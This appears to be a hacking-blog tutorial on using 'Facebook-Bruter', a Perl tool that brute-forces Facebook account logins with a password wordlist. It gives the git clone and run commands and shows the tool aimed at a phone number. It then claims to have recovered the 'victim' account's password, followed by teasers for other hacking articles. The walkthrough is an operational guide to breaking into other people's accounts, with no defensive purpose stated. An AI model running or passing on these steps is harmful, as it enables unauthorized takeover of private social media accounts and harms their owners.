Hey Folks, in this tutorial we are going to talk about an another facebook brute forcing tool called βFacebook-Bruterβ. Basically facebook bruter is a facebook cracking tool from which you can crack login of facebook accounts using dictionary or wordlist. You have to provide the victim account username, email or phone number as well as a wordlist, which should contain millions of passwords. Thtaβs it π !!
Lets take a look π !!
This tool is basically coded in Perl language, so we have to install Perl tool to use this tool.
apt install perl
Simply first we install this tool from gitub by using git command then go to directory of this tool and boot it by using the perl command.
git clone https://github.com/imadoxhunter/Facebook-Bruter.git
cd Facebook-Bruter/
perl Facebook-Bruter.pl
Using the previous one command, we can also see all the features of this tool.
perl Facebook-Bruter.pl
All you have to do is change the target email address and wordlist location according to your from given command and execute it.
Usage π !! perl Facebook-Bruter.pl < email/number > < wordlist >
perl Facebook-Bruter.pl 9891924836 /root/pas.txt
Done π !! As you can see, we have got the correct password for the user account from wich we can login to his account.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.